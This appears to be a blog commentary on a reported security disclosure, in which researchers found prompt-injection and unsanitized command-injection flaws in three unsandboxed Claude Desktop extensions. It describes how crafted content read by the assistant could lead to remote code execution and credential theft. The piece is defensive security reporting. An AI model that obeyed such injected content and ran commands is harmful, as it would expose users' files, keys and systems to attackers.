According to Infosecurity Magazine, researchers at Koi Security found that three of Anthropic’s official Claude Desktop extensions were vulnerable to prompt injection attacks. The vulnerabilities, reported through Anthropic’s HackerOne program on July 3 and rated as high severity with a CVSS score of 8.9, affected the Chrome, iMessage and Apple Notes connectors. These Model Context Protocol servers allow Claude to act on behalf of users by connecting to web services and applications. Unlike browser extensions that run sandboxed, Claude Desktop extensions run unsandboxed with full system permissions, meaning they can read files, execute commands, and access credentials. The unsanitized command injection vulnerabilities could turn any question to Claude into remote code execution if malicious actors craft content that gets accessed by Claude Desktop.
Why this matters
Here’s the thing about AI assistants – we’re giving them unprecedented access to our systems, but the security models haven’t quite caught up. These weren’t just simple browser plugins. They had full system permissions, which is basically handing over the keys to your digital kingdom. And the scary part? Claude would execute malicious commands thinking it was just helping you out. That’s the fundamental risk with these AI-powered tools – they’re designed to be helpful, but that helpfulness can be weaponized.
Broader implications
This incident really highlights the growing pains in the AI assistant space. Every major player – Google with Gemini, Microsoft with Copilot, OpenAI with ChatGPT – is racing to integrate their models deeper into our workflows. But security often takes a backseat to functionality. Think about it: how many companies are properly vetting these AI extensions before rolling them out to employees? Probably not enough.
The timing is particularly interesting given the recent surge in AI adoption. Companies are desperate to stay competitive, but incidents like this show we might be moving too fast. When an extension can potentially grab your SSH keys or AWS credentials, that’s not just a minor security issue – that’s a business-ending risk for many organizations.
What’s next
I suspect we’ll see a wave of similar discoveries across other AI platforms. Koi Security demonstrated how these vulnerabilities work, and now every security researcher is probably looking at other AI extensions with fresh eyes. The industry needs to develop proper sandboxing and permission models specifically for AI tools, rather than just treating them like traditional software.
For users, the takeaway is clear: be extremely careful about what extensions you install, even from official marketplaces. Just because something comes from Anthropic or another big name doesn’t mean it’s automatically safe. The AI security landscape is still evolving, and we’re all basically beta testers whether we realize it or not.
